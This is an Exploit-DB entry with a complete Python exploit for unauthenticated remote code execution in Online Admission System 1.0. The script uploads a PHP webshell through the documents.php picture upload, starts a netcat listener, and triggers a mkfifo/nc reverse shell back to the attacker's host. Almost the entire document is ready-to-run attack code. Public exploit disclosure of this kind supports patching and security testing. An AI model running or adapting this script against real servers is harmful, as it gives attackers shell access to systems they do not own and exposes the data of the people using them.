Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

EDB-ID:

50623

CVE:

N/A




Platform:

PHP

Date:

2022-01-05


# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 23/12/2021
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System
# Software Link: https://github.com/rskoolrash/Online-Admission-System
# Tested on: LAMP Stack (Debian 10)

#!/usr/bin/python
import sys
import re
import argparse
import requests
import time
import subprocess

print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)')

path = '/' #change me if the path to the /oas is in the root directory or another subdir

class Exploit:

	def __init__(self, target_ip, target_port, localhost, localport):
		self.target_ip = target_ip
		self.target_port = target_port
		self.localhost = localhost
		self.localport = localport

	def exploitation(self):
		payload = """<?php system($_GET['cmd']); ?>"""
		payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""

		url = 'http://' + target_ip + ':' + target_port + path
		r = requests.Session()

		print('[*] Resolving URL...')
		r1 = r.get(url + 'documents.php')
		time.sleep(3)

		#Upload the payload file
		print('[*] Uploading the webshell payload...')
		files = {
		'fpic': ('cmd.php', payload + '\n', 'application/x-php'),
		'ftndoc': ('', '', 'application/octet-stream'),
		'ftcdoc': ('', '', 'application/octet-stream'),
		'fdmdoc': ('', '', 'application/octet-stream'),
		'ftcdoc': ('', '', 'application/octet-stream'),
		'fdcdoc': ('', '', 'application/octet-stream'),
		'fide': ('', '', 'application/octet-stream'),
		'fsig': ('', '', 'application/octet-stream'),
		}
		data = {'fpicup':'Submit Query'}
		r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data)
		time.sleep(3)

		print('[*] Setting up netcat listener...')
		listener = subprocess.Popen(["nc", "-nvlp", self.localport])
		time.sleep(3)

		print('[*] Spawning reverse shell...')
		print('[*] Watchout!')
		r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2)
		time.sleep(3)

		if (r3.status_code == 200):
			print('[*] Got shell!')
			while True:
				listener.wait()
		else:
			print('[-] Something went wrong!')
			listener.terminate()

def get_args():
	parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)')
	parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
	parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
	parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
	parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
	args = parser.parse_args()
	return args

args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport

exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()